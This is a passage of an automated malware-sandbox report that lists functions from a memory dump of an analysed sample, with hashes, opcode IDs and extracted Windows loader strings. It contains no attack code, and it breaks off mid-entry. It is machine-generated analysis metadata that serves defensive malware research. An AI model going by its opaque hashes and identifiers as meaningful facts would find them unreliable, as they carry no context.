                                                              • Instruction Fuzzy Hash: 395149B1E1025EAEDF15DFA9CC80AEEBBB8EB54758F100569E611B7280D7349905CB60
                                                              Function 011904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 01190540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0119063D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 6c4c2fab0afd207d046eee6ece970201a19205cf39a5ed6aa2b44e4d8abc8706
                                                              • Instruction ID: ce3fdbc70084a3408b8395afce7ac9b7469c01651c23c21da1d5bb49d56536d9
                                                              • Opcode Fuzzy Hash: 6c4c2fab0afd207d046eee6ece970201a19205cf39a5ed6aa2b44e4d8abc8706
                                                              • Instruction Fuzzy Hash: 8A51CF715047428FDB28DF68C5406A7BBE9AF89304F14883EFAFA87241E770E545CB92
                                                              Function 0119A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0119A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0119A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: b38de2248254fb7513091ceb99627ce94ef38a2f98163667e8e2189055ab7047
                                                              • Instruction ID: 86993fee0567949a4fb7701a435ee00d3408da02a2fb1f983865465c8d242038
                                                              • Opcode Fuzzy Hash: b38de2248254fb7513091ceb99627ce94ef38a2f98163667e8e2189055ab7047
                                                              • Instruction Fuzzy Hash: FB41AD30A08649DBDB2DCF59D850B6EBBB4FF84704F2540A9EE20DB291E3B5DA04CB51
                                                              Function 011CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: def58f82623522b1374364d44f0c3523215132bcccc4b80cb365d63bae605d39
                                                              • Instruction ID: cfd87df3005b9efce473976d846598c63d9140ddbffbab6b128e19c024a7f999
                                                              • Opcode Fuzzy Hash: def58f82623522b1374364d44f0c3523215132bcccc4b80cb365d63bae605d39
                                                              • Instruction Fuzzy Hash: 0A01F4B2250748AFD316DF14DD49F1677E9EB94B19F01893DA658C7590F334D804CB46
                                                              Function 0119C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 2fb5a5c0c43b1b25f551c689cf8266d80c85b08b331f06cf2242d37de1e5fe7e
                                                              • Instruction ID: d4dcc3e80816a878ca90e6813d9930579f69d25d449596937f7afd41fb18d7bb
                                                              • Opcode Fuzzy Hash: 2fb5a5c0c43b1b25f551c689cf8266d80c85b08b331f06cf2242d37de1e5fe7e
                                                              • Instruction Fuzzy Hash: 8E826A75E002198FEF29CFA9D880BEDBBB1BF48350F148169D969AB251D730AD41CB91
                                                              Function 01216420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: fa81fefa6f77e0573ce554c30007aa53e81c7d8bc5c6fe6db5442cdb89f57d80
                                                              • Instruction ID: 392466c74070b11c06eca6c93b5ae73a0be93ba4e2a1469463a710c3fc5915b1
                                                              • Opcode Fuzzy Hash: fa81fefa6f77e0573ce554c30007aa53e81c7d8bc5c6fe6db5442cdb89f57d80
                                                              • Instruction Fuzzy Hash: A791607295121ABFEB25DF95CC85FAEBBB9EF14B54F100015F600AB194D775A900CBA0
                                                              Function 0123E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 7cb6704c7397891a0c4b4f3587be3276dda8a2374fe30d4126baeb94511b27ea
                                                              • Instruction ID: cb9a4097853308d7189e88feddced917cacf956425f1459fcc0a45d04dd8eaee
                                                              • Opcode Fuzzy Hash: 7cb6704c7397891a0c4b4f3587be3276dda8a2374fe30d4126baeb94511b27ea
                                                              • Instruction Fuzzy Hash: 6691D3B192060ABFDB26AFA4DC44FEFBB79EF95744F010029F611A7250D7749909CB90
                                                              Function 011CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: fe43ebd5710c7afa73d8d8463f1abd880ae4f83c0456fd08bc685c7654c1d654
                                                              • Instruction ID: 7b002b595ca6c165300945bff814e05e5ec3cdd2b2fba85bff195e0b7cdc2424
                                                              • Opcode Fuzzy Hash: fe43ebd5710c7afa73d8d8463f1abd880ae4f83c0456fd08bc685c7654c1d654
                                                              • Instruction Fuzzy Hash: 197190B5E1021A8FDF2ACF9CD4806EDBBB2FF48710F14822EE505A7292E7718911CB50
                                                              Function 01234978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 056c8cf7f577351650a329ecc9c4477bfab5acab74382faf7e2e41d8d0818699
                                                              • Instruction ID: 6a6f9f7eed0d54668a4d502509fdf185f5a471dc6660507ab4985818eb6dd46a
                                                              • Opcode Fuzzy Hash: 056c8cf7f577351650a329ecc9c4477bfab5acab74382faf7e2e41d8d0818699
                                                              • Instruction Fuzzy Hash: 1851ECB2D2026ADBDF14EF99D840AEEBBB5BF54604F0541A9EA11F7240D3745C02CBE4
                                                              Function 011AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 6b1b4889138adc670998821234ea1c197c3eb0ff4e6df7390afc44b0f59e2082
                                                              • Instruction ID: 6b5792e172edcff1e4a511ae9eea3256ba63a9caea78a802ffe23b72d41ee6e3
                                                              • Opcode Fuzzy Hash: 6b1b4889138adc670998821234ea1c197c3eb0ff4e6df7390afc44b0f59e2082
                                                              • Instruction Fuzzy Hash: 0D419276509702ABD719DAB5C980B6BBFE8AF88718F84092DF684D7140E774D904C793
                                                              Function 0120C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 0efbb03831eabdd26869dd1708c2941232399bbd1fe048b5d872c19e31ec5f21
                                                              • Instruction ID: edfb89379dc07cacbc6ed1274b8cdffbb872ef807183ad53372970756f878372
                                                              • Opcode Fuzzy Hash: 0efbb03831eabdd26869dd1708c2941232399bbd1fe048b5d872c19e31ec5f21
                                                              • Instruction Fuzzy Hash: 274166F1D1052DABDB22DA50CC84FDEB77CAB44718F0046E5A708AB181DB709E998F98
                                                              Function 01226B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 9fde7b94e939291a3f64df11ee743b1e08d86fba2bd02b1eef6a7dcc0bfcece1
                                                              • Instruction ID: 36ab3694723d3df323e04e6907890e77213dff5226cd2cdaa1a4cd844e693156
                                                              • Opcode Fuzzy Hash: 9fde7b94e939291a3f64df11ee743b1e08d86fba2bd02b1eef6a7dcc0bfcece1
                                                              • Instruction Fuzzy Hash: 89312F32E1076ABBDB26EF69C858BEE7BB8DF04704F544028EE41AB281D775D805CB54
                                                              Function 0120CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 54854f2d683ea0a55e87d26f67e62fed2240dd8927286e41e4ff4fb0e634f964
                                                              • Instruction ID: 1a6a2f31b41c4f039ec7322da764417e6d18c733f327f37714d589bfff16ecd3
                                                              • Opcode Fuzzy Hash: 54854f2d683ea0a55e87d26f67e62fed2240dd8927286e41e4ff4fb0e634f964
                                                              • Instruction Fuzzy Hash: 703129B6910916AFDB16DB58C841E7FBB74EF40710F0143A9EA11A7292E730DD10D7D0
                                                              Function 0121892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0121895E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: db6f8d83923a7827318daf4760fc4dd0a1439e0ffb2714b2970ffa8f48198de2
                                                              • Instruction ID: 58a58a1b50ffc9438d1be1755ed23f5fbc1fb65841d42fec6c9936f084630edc
                                                              • Opcode Fuzzy Hash: db6f8d83923a7827318daf4760fc4dd0a1439e0ffb2714b2970ffa8f48198de2
                                                              • Instruction Fuzzy Hash: 5201F7322312029BEB24EF59D8C4A6A7BE6EFA5664B04002CF7410669DCF606881C796
                                                              Function 01232000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 876eb6abf447d7c0cbb52a46a6b6a34020af7342ac687c909c80574743fc5f43
                                                              • Instruction ID: 23474c29fd2fc38ba0b8bad85ad0eda2a153e9d86d967af7857cd16272c9b5bf
                                                              • Opcode Fuzzy Hash: 876eb6abf447d7c0cbb52a46a6b6a34020af7342ac687c909c80574743fc5f43
                                                              • Instruction Fuzzy Hash: 4E42B0B5628342DBE725CF68C890A6BBBE5BFC8704F08492DFB8297250D770D845CB52
                                                              Function 01228158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6483e17cb879e38cab5e33145fd9b72396715d0a141cfce0d9f9a42ab52a340
                                                              • Instruction ID: b12b232f198d7bb8445ef7b0508311d1d8de2e2552d9aa2f5f1cf8e15e5659ea
                                                              • Opcode Fuzzy Hash: f6483e17cb879e38cab5e33145fd9b72396715d0a141cfce0d9f9a42ab52a340
                                                              • Instruction Fuzzy Hash: F9424D75E102299FEB24CF69C881BADBBF5BF48304F148199EA49EB242D734D985CF50
                                                              Function 011A2840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc4348364849dfece3321bf90649bb4d4edc9fa110c70796cebf2ebf5bd7c486
                                                              • Instruction ID: f663d695c135d7fa37d156a0614943f6d11dfaa4e3fe56b15e492cfb078ae76a
                                                              • Opcode Fuzzy Hash: bc4348364849dfece3321bf90649bb4d4edc9fa110c70796cebf2ebf5bd7c486
                                                              • Instruction Fuzzy Hash: E032CE74A0075A8FEB2DCF69C8447BEBBF2BF84704F24411DD6869B285E735A842CB51
                                                              Function 0123A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30edb6d015ccc4bab568c0a9d2d972ae74f16da3041100dd08bf2f773ed36681
                                                              • Instruction ID: 3ab08f5b1d70559213271b9e6323f8df3c0714b2e8245b1a740c8d25b0c748d0
                                                              • Opcode Fuzzy Hash: 30edb6d015ccc4bab568c0a9d2d972ae74f16da3041100dd08bf2f773ed36681
                                                              • Instruction Fuzzy Hash: 9C22BFB06346628FEB25CF2DC095776BBF1AF85300F08846ADAD6CB286D375D452DB60
                                                              Function 01196A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a21e84e738ca91e59257e263337b4e5ae8d8458c9102d21a0b813b0ad978ed6
                                                              • Instruction ID: 3a4b2e1a81bbc1ec7e3b935edfe05ab76cad96f85d2399473b23ca89b33c0760
                                                              • Opcode Fuzzy Hash: 5a21e84e738ca91e59257e263337b4e5ae8d8458c9102d21a0b813b0ad978ed6
                                                              • Instruction Fuzzy Hash: A4329C71A04215DFDB29CF68C480AAEBBF1FF48310F148569E966AB391D734E841CB61
                                                              Function 011B4A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 4213ccfdd3b52023777f21c3ba15b267cc165f0e6b4aae5be596ffa15e2f0b20
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 26F16C70E0021A9BDB1DCF99C5D0BEEBBF5AF48714F098129EA06AB741E774D841CB64
                                                              Function 0122892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09e8e750faa71e37b41f438563eaeb703c2817fc6ff8e691c1b7d234429705ed
                                                              • Instruction ID: 264cd566bfa3d5e1954558ede9345e72c42c3540f88f0ad89ac32b22f6475762
                                                              • Opcode Fuzzy Hash: 09e8e750faa71e37b41f438563eaeb703c2817fc6ff8e691c1b7d234429705ed
                                                              • Instruction Fuzzy Hash: C5D1F471E2062AABDF19CF68C841AFEB7F1BF88304F188169D955E7241EB35E905CB50
                                                              Function 011965D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 477b6250ba6c763ca370638584f8afc26bb1f47364e1e5f7352effdb369937f1
                                                              • Instruction ID: a71a8f30fe2edaca773c210cf71d0c5f7e8697b47041b8f4f4da2fc938284210
                                                              • Opcode Fuzzy Hash: 477b6250ba6c763ca370638584f8afc26bb1f47364e1e5f7352effdb369937f1
                                                              • Instruction Fuzzy Hash: 74E19371508341DFCB19CF28C490A6ABBE1FF89318F15896DF5A587351E731E905CBA2
                                                              Function 01188397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48d2675c3bfb3f48489edb97adc518af5a0d0f55cd1b91dc35b8860a6258edcc
                                                              • Instruction ID: c5a515cda5cdc3d6abeb11a496e24c7705ba54de17cf5ac5bf4ac25d3374c03a
                                                              • Opcode Fuzzy Hash: 48d2675c3bfb3f48489edb97adc518af5a0d0f55cd1b91dc35b8860a6258edcc
                                                              • Instruction Fuzzy Hash: CDD1F571A00A069BDB1CEFA9C880BBA77F5BF54308F45862DE916DB280E734E951CF50
                                                              Function 01218243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: b7c2f32cc9c861d923969fa9dc9dfa425fc5d00f937d0d6063ff8d84e96bea96
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 99B1B575A10605AFDB25DF58C980EAFBBF9FFA4304F10441EAA4297798DB35E905CB10
                                                              Function 011A0535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 50cdfe53c21526b44246e99f9db9381ead511f45815376d6f55264680443f9c8
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 8BB12635600646AFDB2DCBA8C850BBFBFF6AF88304F550159E696D7281DB30E941CB91
                                                              Function 011983C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c794cb2d5031655504d4491a97f15d8776c4ad741c23cf23aa3b8ce92646c2c
                                                              • Instruction ID: 5f16ab92343a0e30d1faeeb84771963eb61bf28ccdcc48d14242396dc9a12662
                                                              • Opcode Fuzzy Hash: 2c794cb2d5031655504d4491a97f15d8776c4ad741c23cf23aa3b8ce92646c2c
                                                              • Instruction Fuzzy Hash: 3AC16970208345DFE768CF19C484BABB7E5BF88304F44496DEA9987291D774E909CFA2
                                                              Function 0118C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8aaffc6875007dcb9052359e20b376fedbbb9ba565ffeadb321d63792d89dfd
                                                              • Instruction ID: fdee5bddd9dbb8966a80af971a62e3c7ad8b91a97cc6cd5cce6b8329917e071a
                                                              • Opcode Fuzzy Hash: e8aaffc6875007dcb9052359e20b376fedbbb9ba565ffeadb321d63792d89dfd
                                                              • Instruction Fuzzy Hash: 53B16070B006668BDB68DF68C890BE9B7F5AF44704F04C5E9D50AA7281EB309D85CF71
                                                              Function 011BE5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9bef50d5d0462546568037dba795b557b303167af225f5d1a2a602ab2754f112
                                                              • Instruction ID: 680930837ecbfc994ffca316d53409ef0519d4a4570d1291e19643b2d6b7304b
                                                              • Opcode Fuzzy Hash: 9bef50d5d0462546568037dba795b557b303167af225f5d1a2a602ab2754f112
                                                              • Instruction Fuzzy Hash: F4A11732E0161A9FEB2DDB98C888FEDBBB4BB01714F050119EB11AB291D7B49D41CBD1
                                                              Function 011D0185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d561ae2bef5a0227f5e1a308382fbcdec16dcfe8746688944608365b24c0d585
                                                              • Instruction ID: ce3c7cc0de0afa1739ee30bd5fb26b016aca2552384af50afdb40d835ac04321
                                                              • Opcode Fuzzy Hash: d561ae2bef5a0227f5e1a308382fbcdec16dcfe8746688944608365b24c0d585
                                                              • Instruction Fuzzy Hash: E3A1F371B016169FDB2DDF69C890BBAB7B5FF58318F004129EA4AD7282DB34E841CB41
                                                              Function 01264500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49fa53ff024110b9824c8e8766b4df9a247a6fd179457c5e77f8bac0869e5000
                                                              • Instruction ID: 78d9b064616f1de042317483b014916a13bc33652f34924d135e1bd3734ddc58
                                                              • Opcode Fuzzy Hash: 49fa53ff024110b9824c8e8766b4df9a247a6fd179457c5e77f8bac0869e5000
                                                              • Instruction Fuzzy Hash: D9A1F472A24292DFC716EF18CD80B5ABBE9FF58708F444529F6859B690C334ED81CB91
                                                              Function 012160E0 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 570224d11d50f7c3f2707ee1ecc9aeb53118154d9b3c3c57c5dae95e1a185351
                                                              • Instruction ID: 63d2f6b2a7d4a8b7ca686de017e2149f546eac081d647a7b62b8780b87d1a361
                                                              • Opcode Fuzzy Hash: 570224d11d50f7c3f2707ee1ecc9aeb53118154d9b3c3c57c5dae95e1a185351
                                                              • Instruction Fuzzy Hash: 0091B271D10216AFDB15CFA8D884BBEBFF9AF58710F154169EA10EB345D7B4D9008BA0
                                                              Function 011AE3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
